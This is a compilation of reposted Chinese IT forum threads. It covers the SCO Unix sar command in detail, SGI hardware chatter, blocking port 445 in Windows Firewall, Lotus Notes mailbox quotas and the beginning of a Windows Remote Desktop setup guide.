YT 回复于：2003-02-01 20:16:14希望大家对SGI的产品多多了解一点, 多学点好知识总好D呀.....

孤独的鹰回复于：2003-02-08 20:36:49有次在二手市场看见到了O2，一直想了解一下

fanqiang 回复于：2003-02-09 18:49:25有点像看广告的感觉，不过，看完后对SGI的产品还是有点了解了一些：）

YT 回复于：2003-02-10 10:01:20哈，多谢大家捧场～！

一个学生回复于：2003-02-10 10:22:25好东西

szh 回复于：2003-02-10 12:23:42www.sgi.com.cn/news/default2.php?more=1&page=1&channel=13

YT 回复于：2003-02-10 13:05:43你这是什么意思啊？

szh 回复于：2003-02-10 13:11:27呵呵!!

我是说好多东西在这个链接可以找的到的!!YT老大生气了!!!

嘿@!!

YT 回复于：2003-02-11 12:06:00

怒怒~

YT 回复于：2003-02-13 18:39:06[quote:f3333fb757=“iricyan”]建议YY做IRIX版D斑竹！[/quote:f3333fb757]

那偶就挖个坑，骗你来灌水，然后 rm -rf，嘿嘿嘿嘿．．．

iricyan 回复于：2003-02-13 18:20:00建议YY做IRIX版D斑竹！

answer 回复于：2003-02-14 20:56:48我以前见过一台sgi的服务器，装的系统是nt4.0。

为什么我不明白。

race 回复于：2003-02-14 23:53:10SGI有支持NT的产品

YT 回复于：2003-02-22 16:00:48NT已经属于比较地段D东西了，看来SGI也在向低端靠拢。

pengpengou 回复于：2003-02-28 12:43:19请问SGI的CPU种类象奔腾多小多小`~

phoenixli 回复于：2003-03-04 20:27:05什么呀,听不懂...这里只讨论UNIX,不讨论PC.

davy-chen 回复于：2003-03-04 21:57:29以前搞过SGI好长的一段时间，那时的机型现在都没有了。现在，也忘的差不多了！

但总觉得现在的是好了很多！

可惜！

phoenixli 回复于：2003-03-04 22:04:56好很多?不会吧?都找不到了~~

davy-chen 回复于：2003-03-04 22:27:21只是他的市场做的太差了！

原来的石油单位几乎全是。

mhere 回复于：2003-08-06 14:27:10遇到BT了。把SGI中文网站搬过来了，累了，歇歇，谢谢。

原文转自：www.ltesting.net

篇15：sar命令介绍Windows系统

sar命令行的常用格式： sar[options][-A][-ofile]t[n] 在命令行中，n和t两个参数组合起来定义采样间隔和次数，t为采样间隔，是必须有的参数，n为采样次数，是可选的，默认值是1，-ofile表示将命令结果以二进制格式存放在文件中，file在此处不是关键字，是

sar 命令行的常用格式：

sar [options] [-A] [-o file] t [n]

在命令行中，n 和t 两个参数组合起来定义采样间隔和次数，t为采样间隔，是必须有

的参数，n为采样次数，是可选的，默认值是1，-o file表示将命令结果以二进制格式

存放在文件中，file 在此处不是关键字，是文件名，options 为命令行选项，sar命令

的选项很多，下面只列出常用选项：

-A：所有报告的总和。

-u：CPU利用率

-v：进程、I节点、文件和锁表状态。

-d：硬盘使用报告。

-r：没有使用的内存页面和硬盘块。

-g：串口I/O的情况。

-b：缓冲区使用情况。

-a：文件读写情况。

-c：系统调用情况。

-R：进程的活动情况。

-y：终端设备活动情况。

-w：系统交换活动。

下面将举例说明。

例一：使用命令行 sar -u t n

例如，每60秒采样一次，连续采样5次，观察CPU 的使用情况，并将采样结果以二进制

形式存入当前目录下的文件zhou中，需键入如下命令：

# sar -u -o zhou 60 5

屏幕显示：

SCO_SV scosysv 3.2v5.0.5 i80386 10/01/

14:43:50 %usr %sys %wio %idle(-u)

14:44:50 0 1 494

14:45:50 0 2 493

14:46:50 0 2 296

14:47:50 0 2 593

14:48:50 0 2 296

Average 0 2 494

在显示内容包括：

%usr：CPU处在用户模式下的时间百分比。

%sys：CPU处在系统模式下的时间百分比。

%wio：CPU等待输入输出完成时间的百分比。

%idle：CPU空闲时间百分比。

在所有的显示中，我们应主要注意%wio和%idle，%wio的值过高，表示硬盘存在I/O瓶颈，

%idle值高，表示CPU较空闲，如果%idle值高但系统响应慢时，有可能是CPU等待分配内存，

此时应加大内存容量。%idle值如果持续低于10，那么系统的CPU处理能力相对较低，表

明系统中最需要解决的资源是CPU。

如果要查看二进制文件zhou中的内容，则需键入如下sar命令：

# sar -u -f zhou

可见，sar命令即可以实时采样，又可以对以往的采样结果进行查询。

例二：使用命行sar -v t n

例如，每30秒采样一次，连续采样5次，观察核心表的状态，需键入如下命令：

# sar -v 30 5

屏幕显示：

SCO_SV scosysv 3.2v5.0.5 i80386 10/01/2001

10:33:23 proc-sz ov inod-sz ov file-sz ov lock-sz (-v)

10:33:53 305/ 321 0 1337/2764 0 1561/1706 0 40/ 128

10:34:23 308/ 321 0 1340/2764 0 1587/1706 0 37/ 128

10:34:53 305/ 321 0 1332/2764 0 1565/1706 0 36/ 128

10:35:23 308/ 321 0 1338/2764 0 1592/1706 0 37/ 128

10:35:53 308/ 321 0 1335/2764 0 1591/1706 0 37/ 128

显示内容包括：

proc-sz：目前核心中正在使用或分配的进程表的表项数，由核心参数MAX-PROC控制。

inod-sz：目前核心中正在使用或分配的i节点表的表项数，由核心参数

MAX-INODE控制。

file-sz：目前核心中正在使用或分配的文件表的表项数，由核心参数MAX-FILE控

制。

ov：溢出出现的次数。

Lock-sz：目前核心中正在使用或分配的记录加锁的表项数，由核心参数MAX-FLCKRE

控制。

显示格式为

实际使用表项/可以使用的表项数

显示内容表示，核心使用完全正常，三个表没有出现溢出现象，核心参数不需调整，如

果出现溢出时，要调整相应的核心参数，将对应的表项数加大。

例三：使用命行sar -d t n

例如，每30秒采样一次，连续采样5次，报告设备使用情况，需键入如下命令：

# sar -d 30 5

屏幕显示：

SCO_SV scosysv 3.2v5.0.5 i80386 10/01/2001

11:06:43 device %busy avque r+w/s blks/s avwait avserv (-d)

11:07:13 wd-0 1.47 2.75 4.67 14.73 5.50 3.14

11:07:43 wd-0 0.43 18.77 3.07 8.66 25.11 1.41

11:08:13 wd-0 0.77 2.78 2.77 7.26 4.94 2.77

11:08:43 wd-0 1.10 11.18 4.10 11.26 27.32 2.68

11:09:13 wd-0 1.97 21.78 5.86 34.06 69.66 3.35

Average wd-0 1.15 12.11 4.09 15.19 31.12 2.80

显示内容包括：

device： sar命令正在监视的块设备的名字。

%busy：设备忙时，传送请求所占时间的百分比。

avque：队列站满时，未完成请求数量的平均值。

r+w/s：每秒传送到设备或从设备传出的数据量。

blks/s：每秒传送的块数，每块512字节。

avwait：队列占满时传送请求等待队列空闲的平均时间。

avserv：完成传送请求所需平均时间（毫秒）。

在显示的内容中，wd-0是硬盘的名字，%busy的值比较小，说明用于处理传送请求的有

效时间太少，文件系统效率不高，一般来讲，%busy值高些，avque值低些，文件系统

的效率比较高，如果%busy和avque值相对比较高，说明硬盘传输速度太慢，需调整。

例四：使用命行sar -b t n

例如，每30秒采样一次，连续采样5次，报告缓冲区的使用情况，需键入如下命令：

# sar -b 30 5

屏幕显示：

SCO_SV scosysv 3.2v5.0.5 i80386 10/01/2001

14:54:59 bread/s lread/s %rcache bwrit/s lwrit/s %wcache pread/s pwrit/s (-b)

14:55:29 0 147 100 5 21 78 0 0

14:55:59 0 186 100 5 25 79 0 0

14:56:29 4 232 98 8 58 86 0 0

14:56:59 0 125 100 5 23 76 0 0

14:57:29 0 89 100 4 12 66 0 0

Average 1 156 99 5 28 80 0 0

显示内容包括：

bread/s：每秒从硬盘读入系统缓冲区buffer的物理块数。

lread/s：平均每秒从系统buffer读出的逻辑块数。

%rcache：在buffer cache中进行逻辑读的百分比。

bwrit/s：平均每秒从系统buffer向磁盘所写的物理块数。

lwrit/s：平均每秒写到系统buffer逻辑块数。

%wcache：在buffer cache中进行逻辑读的百分比。

pread/s：平均每秒请求物理读的次数。

pwrit/s：平均每秒请求物理写的次数。

在显示的内容中，最重要的是%cache和%wcache两列，它们的值体现着buffer的使用效

率，%rcache的值小于90或者%wcache的值低于65，应适当增加系统buffer的数量，buffer

数量由核心参数NBUF控制，使%rcache达到90左右，%wcache达到80左右。但buffer参数

值的多少影响I/O效率，增加buffer，应在较大内存的情况下，否则系统效率反而得不到

提高。

例五：使用命行sar -g t n

例如，每30秒采样一次，连续采样5次，报告串口I/O的操作情况，需键入如下命令：

# sar -g 30 5

屏幕显示：

SCO_SV scosysv 3.2v5.0.5 i80386 11/22/2001

17:07:03 ovsiohw/s ovsiodma/s ovclist/s (-g)

17:07:33 0.00 0.00 0.00

17:08:03 0.00 0.00 0.00

17:08:33 0.00 0.00 0.00

17:09:03 0.00 0.00 0.00

17:09:33 0.00 0.00 0.00

Average 0.00 0.00 0.00

显示内容包括：

ovsiohw/s：每秒在串口I/O硬件出现的溢出。

ovsiodma/s：每秒在串口I/O的直接输入输出通道高速缓存出现的溢出。

ovclist/s ：每秒字符队列出现的溢出。

在显示的内容中，每一列的值都是零，表明在采样时间内，系统中没有发生串口I/O溢

出现象。

sar命令的用法很多，有时判断一个问题，需要几个sar命令结合起来使用，比如，怀疑

CPU存在瓶颈，可用sar -u 和sar -q来看，怀疑I/O存在瓶颈，可用sar -b、sar -u和

sar-d来看

spirit 回复于：-12-15 10:22:22留着晚上消化

天明700 回复于：2002-12-15 11:41:29不错么

chinawhd 回复于：2002-12-15 12:10:44# sar -u -o zhou 60 5

屏幕显示：

SCO_SV scosysv 3.2v5.0.5 i80386 10/01/2001

14:43:50 %usr %sys %wio %idle(-u)

14:44:50 0 1 494

14:45:50 0 2 493

14:46:50 0 2 296

14:47:50 0 2 593

14:48:50 0 2 296

Average 0 2 494

怎么你的显示前面有两条总数不到100%呢？

chinawhd 回复于：2002-12-15 12:18:53我用

sar -u -o zhou 60 5

这个命令怎么产生了4个文件呢？

由个带扩展名：1 2

flybirdxp 回复于：2002-12-15 15:15:10[quote][b]下面引用由[u]chinawhd[/u]在 [i]2002/12/15 12:10pm[/i] 发表的内容：[/b]

# sar -u -o zhou 60 5

屏幕显示：

SCO_SV scosysv 3.2v5.0.5 i80386 10/01/2001

14:43:50 %usr %sys %wio %idle(-u)

...

[/quote]

小数部分被忽略了

lovqing 回复于：2002-12-15 15:20:34Sar

-A 所有的报告总和

-a 文件读，写报告

-B 报告附加的buffer cache使用情况

-b buffer cache使用情况

-c 系统调用使用报告

-d 硬盘使用报告

-g 有关串口I/O情况

-h 关于buffer使用统计数字

-m IPC消息和信号灯活动

-n 命名cache

-p 调页活动

-q 运行队列和交换队列的平均长度

-R 报告进程的活动

-r 没有使用的内存页面和硬盘块

-u CPU利用率

-v 进程，i节点，文件和锁表状态

-w 系统交换活动

-y TTY设备活动

-a 报告文件读，写报告

sar Ca 5 5

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/07/2002

11:45:40 iget/s namei/s dirbk/s (-a)

11:45:45 6 2 2

11:45:50 91 20 28

11:45:55 159 20 18

11:46:00 157 21 19

11:46:05 177 30 35

Average 118 18 20

iget/s 每秒由i节点项定位的文件数量

namei/s 每秒文件系统路径查询的数量

dirbk/s 每秒所读目录块的数量

＊这些值越大，表明核心花在存取用户文件上的时间越多，它反映着一些程序和应用文件系统产生的负荷。一般地，如果iget/s与namei/s的比值大于5，并且namei/s的值大于30，则说明文件系统是低效的。这时需要检查文件系统的自由空间，看看是否自由空间过少。

-b 报告缓冲区（buffer cache）的使用情况

sar -b 2 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/07/2002

13:51:28 bread/s lread/s %rcache bwrit/s lwrit/s %wcache pread/s pwrit/s (-b)

13:51:30 382 1380 72 131 273 52 0 0

13:51:32 378 516 27 6 22 72 0 0

13:51:34 172 323 47 39 57 32 0 0

Average 310 739 58 58 117 50 0 0

bread/s 平均每秒从硬盘（或其它块设备）读入系统buffer的物理块数

lread/s 平均每秒从系统buffer读出的逻辑块数

%rcache 在buffer cache中进行逻辑读的百分比（即100％ - bread/lreads）

bwrit/s 平均每秒从系统buffer向磁盘（或其它块设备）所写的物理块数

lwrit/s 平均每秒写到系统buffer的逻辑块数

%wcache 在buffer cache中进行逻辑写的百分比（即100％ - bwrit/lwrit）.

pread/sgu 平均每秒请求进行物理读的次数

pwrit/s 平均每秒请求进行物理写的次数

＊所显示的内容反映了目前与系统buffer有关的读，写活。在所报告的数字中，最重要的是%rcache和%wcache（统称为cache命中率）两列，它们具体体现着系统buffer的效率。衡量cache效率的标准是它的命中率值的大小。

＊如果%rcache的值小于90或者%wcache的值低于65，可能就需要增加系统buffer的数量。如果在系统的应用中，系统的I/O活动十分频繁，并且在内存容量配置比较大时，可以增加buffer cache，使%rcache达到95左右，%wcache达到80左右。

＊系统buffer cache中，buffer的数量由核心参数NBUF控制。它是一个要调的参数。系统中buffer数量的多少是影响系统I/O效率的瓶颈。要增加系统buffer数量，则要求应该有较大的内存配置。否则一味增加buffer数量，势必减少用户进程在内存中的运行空间，这同样会导致系统效率下降。

-c 报告系统调用使用情况

sar -c 2 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/07/2002

17:02:42 scall/s sread/s swrit/s fork/s exec/s rchar/s wchar/s (-c)

17:02:44 2262 169 141 0.00 0.00 131250 22159

17:02:46 1416 61 38 0.00 0.00 437279 6464

17:02:48 1825 43 25 0.00 0.00 109397 42331

Average 1834 91 68 0.00 0.00 225975 23651

scall/s 每秒使用系统调用的总数。一般地，当4~6个用户在系统上工作时，每秒大约30个左右。

sread/s 每秒进行读操作的系统调用数量。

swrit/s 每秒进行写操作的系统调用数量。

fork/s 每秒fork系统调用次数。当4~6个用户在系统上工作时，每秒大约0.5秒左右。

exec/s 每秒exec系统调用次数。

rchar/s 每秒由读操作的系统调用传送的字符（以字节为单位）。

wchar/s 每秒由写操作的系统调用传送的字符（以字节为单位）。

＊如果scall/s持续地大于300，则表明正在系统中运行的可能是效率很低的应用程序。在比较

典型的情况下，进行读操作的系统调用加上进行写操作的系统调用之和，约是scall的一半左右。

-d 报告硬盘使用情况

sar -d 2 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/07/2002

17:27:49 device %busy avque r+w/s blks/s avwait avserv (-d)

17:27:51 ida-0 6.93 1.00 13.86 259.41 0.00 5.00

ida-1 0.99 1.00 17.33 290.10 0.00 0.57

17:27:53 ida-0 75.50 1.00 54.00 157.00 0.00 13.98

ida-1 9.50 1.00 12.00 75.00 0.00 7.92

17:27:55 ida-0 7.46 1.00 46.77 213.93 0.00 1.60

ida-1 17.41 1.00 57.71 494.53 0.00 3.02

Average ida-0 29.85 1.00 38.14 210.28 0.00 7.83

ida-1 9.29 1.00 29.02 286.90 0.00 3.20

device 这是sar命令正在监视的块设备的名字，

%busy 设备忙时，运行传送请求所占用的时间。这个值以百分比表示。

avque 在指定的时间周期内，没有完成的请求数量的平均值。仅在队列被占满时取这个值。

r+w/s 每秒传送到设备或者从设备传送出的数据量。

blks/s 每秒传送的块数。每块512个字节。

avwait 传送请求等待队列空闲的平均时间（以毫秒为单位）。仅在队列被占满时取这个值。

avserv 完成传送请求所需平均时间（以毫秒为单位）

＊ida-0和ida-1是硬盘的设备名字。在显示的内容中，如果%busy的值比较小，说明用于处理

传送请求的有效时间太少，文件系统的效率不高。要使文件系统的效率得到优化，应使%busy的数值相对高一些，而avque的值应该低一些。

-g 报告有关串口I/O情况

sar -g 3 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/13/2002

11:10:09 ovsiohw/s ovsiodma/s ovclist/s (-g)

11:10:12 0.00 0.00 0.00

11:10:15 0.00 0.00 0.00

11:10:18 0.00 0.00 0.00

Average 0.00 0.00 0.00

ovsiohw/s 每秒在串囗I/O硬件出现的溢出。

ovsiodma/s 每秒在串囗I/O的直接输入，输出信道高速缓存出现的溢出。

ovclist/s 每秒字符队列出现的溢出。

-m 报告进程间的通信活动（IPC消息和信号灯活动）情况

sar -m 4 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/13/2002

13:24:28 msg/s sema/s (-m)

13:24:32 2.24 9.95

13:24:36 2.24 21.70

13:24:40 2.00 36.66

Average 2.16 22.76

msg/s 每秒消息操作的次数（包括发送消息的接收信息）。

sema/s 每秒信号灯操作次数。

＊信号灯和消息作为进程间通信的工具，如果在系统中运行的应用过程中没有使用它们，那么由sar命令报告的msg 和sema的值都将等于0.00。如果使用了这些工具，并且其中或者msg/s大于100，或者sema/s大于100，则表明这样的应用程序效率比较低。原因是在这样的应用程序中，大量的时间花费在进程之间的沟通上，而对保证进程本身有效的运行时间必然产生不良的影响。

-n 报告命名缓冲区活动情况

sar -n 4 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/13/2002

13:37:31 c_hits cmisses (hit %) (-n)

13:37:35 1246 71 (94%)

13:37:39 1853 81 (95%)

13:37:43 969 56 (94%)

Average 1356 69 (95%)

c_hits cache命中的数量。

cmisses cache未命中的数量。

(hit %) 命中数量/(命中数理+未命中数量)。

＊不难理解，(hit %)值越大越好，如果它低于90％，则应该调整相应的核心参数。

-p 报告分页活动

sar -p 5 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/13/2002

13:45:26 vflt/s pflt/s pgfil/s rclm/s (-p)

13:45:31 36.25 50.20 0.00 0.00

13:45:36 32.14 58.48 0.00 0.00

13:45:41 79.80 58.40 0.00 0.00

Average 49.37 55.69 0.00 0.00

vflt/s 每秒进行页面故障地址转换的数量（由于有效的页面当前不在内存中）。

pflt/s 每秒来自由于保护错误出现的页面故障数量（由于对页面的非法存，取引起的页面故障）。

pgfil/s 每秒通过”页―入”满足vflt/s的数量。

rclm/s 每秒由系统恢复的有效页面的数量。有效页面被增加到自由页面队列上。

＊如果vflt/s的值高于100，可能预示着对于页面系统来说，应用程序的效率不高，也可能分页参数需要调整，或者内存配置不太合适。

-q 报告进程队列（运行队列和交换队列的平均长度）情况

sar -q 2 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/13/2002

14:25:50 runq-sz %runoclearcase/“ target=”_blank“ >ccswpq-sz %swpocc (-q)

14:25:52 4.0 50

14:25:54 9.0 100

14:25:56 9.0 100

Average 7.3 100

runq-sz 准备运行的进程运行队列。

%runocc 运行队列被占用的时间（百分比）

swpq-sz 要被换出的进程交换队列。

%swpocc 交换队列被占用的时间（百分比）。

＊如果%runocc大于90，并且runq-sz的值大于2，则表明CPU的负载较重。其直接后果，可能使系统的响应速度降低。如果%swpocc大于20，表明交换活动频繁，将严重导致系统效率下降。解决的办法是加大内存或减少缓存区数量，从而减少交换及页―入,页―出活动。

-r 报告内存及交换区使用情况（没有使用的内存页面和硬盘块）

sar -r 2 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/14/2002

10:14:19 freemem freeswp availrmem availsmem (-r)

10:14:22 279729 6673824 93160 1106876

10:14:24 279663 6673824 93160 1106876

10:14:26 279661 6673824 93160 1106873

Average 279684 6673824 93160 1106875

freemem 用户进程可以使用的内存页面数，4KB为一个页面。

freeswp 用于进程交换可以使用的硬盘盘块，512B为一个盘块。

-u CPU利用率

sar -u 2 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/14/2002

10:27:23 %usr %sys %wio %idle (-u)

10:27:25 2 3 8 88

10:27:27 3 3 5 89

10:27:29 0 0 0 100

Average 2 2 4 92

%usr cpu处在用户模式下时间（百分比）

%sys cpu处在系统模式下时间（百分比）

%wio cpu等待输入，输出完成（时间百分比）

%idle cpu空闲时间（百分比）

＊在显示的内容中，%usr和 %sys这两个值一般情况下对系统无特别影响，%wio的值不能太高，如果%wio的值过高，则CPU花在等待输入，输出上的时间太多，这意味着硬盘存在I/O瓶颈。如果%idle的值比较高，但系统响应并不快，那么这有可能是CPU花时间等待分配内存引起的。%idle的值可以较深入帮助人们了解系统的性能，在这种情况上，%idle的值处于40~100之间，一旦它持续低于30，则表明进程竟争的主要资源不是内存而是CPU。

＊在有大量用户运行的系统中，为了减少CPU的压力，应该使用智能多串卡，而不是非智能多串卡。智能多串卡可以承担CPU的某些负担。

＊此外，如果系统中有大型的作业运行，应该把它们合理调度，错开高峰，当系统相对空闲时再运行。

-v 报告系统表的内容（进程，i节点，文件和锁表状态）

sar -v 2 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/14/2002

10:56:46 proc-sz ov inod-sz ov file-sz ov lock-sz (-v)

10:56:48 449/ 500 0 994/4147 0 1313/2048 0 5/ 128

10:56:50 450/ 500 0 994/4147 0 1314/2048 0 5/ 128

10:56:52 450/ 500 0 994/4147 0 1314/2048 0 5/ 128

proc-sz 目前在核心中正在使用或分配的进程表的表项数

inod-sz 目前在核心中正在使用或分配的i节点表的表项数

file-sz 目前在核心中正在使用或分配的文件表的表项数

ov 溢出出现的次数

lock-sz 目前在核心中正在使用或分配的记录加锁的表项数

＊除ov外，均涉及到unix的核心参数，它们分别受核心参数NPROC,NIMODE,NFILE和FLOCKREC的控制。

＊显示格式为：

实际使用表项/整个表可以使用的表项数

比如，proc-sz一列所显示的四个数字中，分母的100是系统中整个进程表的长度（可建立100个表项），分子上的24，26和25分别是采样的那一段时间所使用的进程表项。inod-sz，file-sz和lock-sz三列数字的意义也相同。

三列ov的值分别对应进程表，i节点表和文件表，表明目前这三个表都没有出现溢出现象，当出现溢出时，需要调整相应的核心参数，将对应表加大。

-w 系统交换活动

sar -w 2 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/14/2002

11:22:05 swpin/s bswin/s swpot/s bswots pswch/s (-w)

11:22:07 0.00 0.0 0.00 0.0 330

11:22:09 0.00 0.0 0.00 0.0 892

11:22:11 0.00 0.0 0.00 0.0 1053

Average 0.00 0.0 0.00 0.0 757

swpin/s 每秒从硬盘交换区传送进入内存的次数。

bswin/s 每秒为换入而传送的块数。

swpot/s 每秒从内存传送到硬盘交换区的次数。

bswots 每秒为换出而传送的块数。

pswch/s 每秒进程交换的数量。

＊swpin/s，bswin/s，swpot/s和bswots描述的是与硬盘交换区相关的交换活动。交换关系到系统的效率。交换区在硬盘上对硬盘的读，写操作比内存读，写慢得多，因此，为了提高系统效率就应该设法减少交换。通常的作法就是加大内存，使交换区中进行的交换活动为零，或接近为零。如果swpot/s的值大于1，预示可能需要增加内存或减少缓冲区（减少缓冲区能够释放一部分自由内存空间）。

-y 报告终端的I/O活动（TTY设备活动）情况

sar -y 2 3

SCO_SV scosvr 3.2v5.0.5 PentII(D)ISA 06/14/2002

11:38:03 rawch/s canch/s outch/s rcvin/s xmtin/s mdmin/s (-y)

11:38:05 5 0 951 0 1 0

11:38:07 10 0 996 0 0 0

11:38:09 4 0 2264 0 0 0

Average 6 0 1404 0 1 0

rawch/s 每秒输入的字符数（原始队列）

canch/s 每秒由正则队列（canonical queue）处理的输入字符数。进行正则处理过程中，可以识别出一些有特殊意义的字符。比如，~~(中断字符)，(退出符)，(退格键)等。因此，canch/s中的计数不包括这些有特殊意义的字符。~~

outch/s 每秒输出的字符数。

rcvin/s 每秒接收的硬件中断次数。

xmtin/s 每秒发出的硬件中断次数。

mdmin/s 每秒modem中断次数。

＊应该特别说明，sar命令可以对任意终端活动进行统计，所谓任意终端，是指任意tty设备。它们可以是串行终端，主控台，伪终端等等。

＊在这几个量中，modem中断次数mdmin/s应该接近0。其它没有特殊要求，但如果每发送一个字符，中断的数量就动态地增加，这表明终端线出了差错，可能是接触不好。

云中飘回复于：2002-12-18 22:55:56很好，谢拉

littlecandy 回复于：2003-08-26 14:30:46真是不错，收藏

studio99 回复于：2003-08-27 09:30:21不错

原文转自：www.ltesting.net

篇16：Windows用户关闭445端口方法

Windows用户关闭445端口方法

打开控制面板在下面找到“windows防火墙”进去后，点击“高级设置”

再在弹出的界面中选择新建规则，如图：

然后选择“端口”，点击下一步

然后选择“特定本地端口”，然后输入“445”然后上面选择“TCP”，如图所示：

然后下面选择“阻止连接”

然后你就能看见相应规则

Windows10之前的版本关闭445端口方法：(此处以Windowsserver为例)

如图点击开始菜单里的“运行”输入”gpedit.msc”点击确定然后点击“计算机配置”→“安全设置”→“ip安全策略”

在本地组策略编辑器右边空白处右键单击鼠标，选择“创建IP安全策略”，弹出IP安全策略向导对话框，单击下一步;在出现的对话框中的名称处写“关闭端口”(可随意填写)

点击下一步;对话框中的“激活默认响应规则”选项不要勾选，

然后单击下一步;勾选“编辑属性”，单击完成。

然后再在上图页面中点击“添加”，弹出如下窗口

第一个选项卡单击“添加”

然后再在“ip筛选器列表”窗口处点击添加，然后做如下配置

然后点击确定

然后再点击“确定”

然后选中新ip筛选器列表点应用确定

然后此处勾选“新Ip筛选列表”再次点击确定

然后再在这个页面右击我们新建的那个规则点击“指派”

当其显示“是”的时候表示端口已经阻塞

篇17：探讨如何限制Notes用户邮箱大小？Windows系统

欢迎有兴趣者交流、补充，共同提高~~~ ==================================================== 标题：如何限制Notes用户邮箱大小？ [前言] 不知道大家有没有遇到这种情况，我们在管理Notes系统时，随着时间的推移，Notes服务器上保存的用户的邮件的数据量会

欢迎有兴趣者交流、补充，共同提高~~~

====================================================

标题：如何限制Notes用户邮箱大小？

[前言]

不知道大家有没有遇到这种情况，我们在管理Notes系统时，随着时间的推移，Notes服务器上保存的用户的邮件的数据量会越来越大，如果服务器配置不够理想的话，会造成不堪负重，甚至造成系统崩溃的危机，

[措施]

那我们有没有比较有效的管理办法来管理用户的邮箱呢？目前在管理我司Notes时是采取如下2个措施：

1、要求对个人的邮件数据库进行定时手动“归档”。

1）在个人邮箱的数据库属性选择“归档设置”，限制归档在几个月内（或者半年）未修改或更新的文档。

2）创建本地归档信箱，定期手动进行邮件归档。

2、同时配套“强制措施”，让用户自行清理自己的邮箱。

1）先压缩全部邮箱，再对每个邮箱作大小限制；

2）然后，在administrator中，配置－消息处理－配置，如果没有配置文件添加配置；

3）然后在新配置中的“路由器/smtp”页面中，在“消息邮递期间遵守配额”处，选择“启用”，邮件数据库在配置了数据库限额以后遵守数据库限额，在邮件超过限额时，用户将无法进行发送和接收。

这样就达到了强迫用户自己经常清理自己的邮箱的目的，减轻了Notes服务器的负担，让用户形成良好的习惯。

居士回复于：-03-27 20:46:56关于限额，dominoR5,R6一直都有bug。

在服务器文档里面启用限额，个人mail数据库也增加限额，但是个别用户的数据库还是会无限制的增大（个别）。

还有关于domino对smtp relay等功能的安全验证等等做的也不是很好，必须两台domino才能防止垃圾邮件，更qmail等mail软件比较差了很多。但，对于domino一个协同办公平台软件来说，我很肯定它的功能的，毕竟还是很好的东西，希望不要被IBM玩烂了～

好男孩回复于：2004-03-29 10:37:24qingzhou ，如果邮件多的话，你的归档间隔有点大了，我是规定最多保存一周，超过7天的必须归档。

qingzhou 回复于：2004-04-01 16:52:47[quote:8c79ad507d=”好男孩“]qingzhou ，如果邮件多的话，你的归档间隔有点大了，我是规定最多保存一周，超过7天的必须归档。[/quote:8c79ad507d]

这个要看具体公司的业务情况，没有硬性指定归档时间的，

。。

qingzhou 回复于：2004-04-01 16:58:34[quote:76d92b1035=”居士“]关于限额，dominoR5,R6一直都有bug。

在服务器文档里面启用限额，个人mail数据库也增加限额，但是个别用户的数据库还是会无限制的增大（个别）。..........[/quote:76d92b1035]

也许有这种情况发生，但在我司还没有遇到过这种情况。

在此不对Notes作过多的评价，个人感觉在处理文档型数据库、协作平台2个领域来说，目前它还是处于遥遥领先地位。。。

居士回复于：2004-04-02 15:50:59我在考虑申请开个domino/notes的新板块呢，各位有何意见？

qingzhou 回复于：2004-04-02 16:17:24上次不是有举行投票么？

我当时还第一个站出来“顶”呢，嘿嘿。。。 :roll: :roll: :roll:

等了那么久，以为都没有希望了。。。 :cry: :cry: :cry:

拜托老大了~~~

如果真的开张了，我会多发帖的。

如果人气不旺，我也会去拉客的，嘻嘻。。。 :lol: :lol: :lol:

jqwu 回复于：2004-04-04 20:20:39我支持。

yhp 回复于：2004-04-05 09:23:45[quote:136e53128d=”qingzhou“]上次不是有举行投票么？

我当时还第一个站出来“顶”呢，嘿嘿。。。 :roll: :roll: :roll:

等了那么久，以为都没有希望了。。。 :cry: :cry: :cry:

拜托老大了~~~

如果真的开张了，我会多发帖的。

如果人..........[/quote:136e53128d]

qingzhou 啊出来接客了

qingzhou 回复于：2004-04-05 12:22:15嘻嘻。。。

我在去年11月18日就开始上CU400来“接客”了，时间真快过，转眼就说5个月了。

我身边有一些关于Notes方面的技术资料和一些较好的文章，此外还有些Notes运用方面的工具软件、OA软件等含源代码的Notes模板，如果开通了Lotus Domino/Notes讨论区，我会要求将下载帖子置顶，并提供下载链接的。

流星蝴蝶剑回复于：2004-04-06 10:46:00顶 :D ，偶是新来的

ynaclearcase/” target=“_blank” >cc回复于：2004-07-18 17:06:02支持支持！！！！我在别的DOMINO论坛上问个问题，半天没人来回复，郁闷死了！希望这里的人能多多帮助。

原文转自：www.ltesting.net

篇18：WINDOWS系统远程桌面连接方法

1、远程桌面简介

当某台计算机开启了远程桌面连接功能后我们就可以在网络的另一端控制这台计算机了，通过远程桌面功能我们可以实时的操作这台计算机，在上面安装软件，运行程序，所有的一切都好像是直接在该计算机上操作一样，这就是远程桌面的最大功能，通过该功能网络管理员可以在家中安全的控制单位的服务器，由于该功能是系统内置的所以比其他第三方远程控制工具在连接速度和质量上有较大的优势。

2、启动远程桌面连接的方法

微软操作系统 WINDOWS SERVER，WINDOWS XP、WINDOWS 、WINDOWS VISTA和最新的WINDOWS7都拥有远程桌面功能，但各系统开启远程桌面方法各不相同，我们一一介绍。

(1)WINDOWS 2000SERVER

WINDOWS2000系统中PROFESSIONAL版本是不能开启远程桌面功能让别人访问的，但SERVER版可以开启，不过需要我们安装相应的WINDOWS组件。方法如下：

第一步：通过任务栏的“开始->设置->控制面板”，选择里头的“添加/删除程序”。

第二步：在左边选择“添加/删除WINDOWS组件”。

第三步：稍后会出现添加删除WINDOWS组件窗口，我们从中选择“终端服务”，然后点“下一步”进行安装。这里要注意一点的是在安装过程中需要我们插入WINDOWS 2000SERVER系统光盘到光驱中。

第四步：安装完毕后需要重新启动计算机，重启后就完成了在WINDOWS 2000SERVER下的远程桌面连接功能的安装工作。

(2)WINDOWS XP

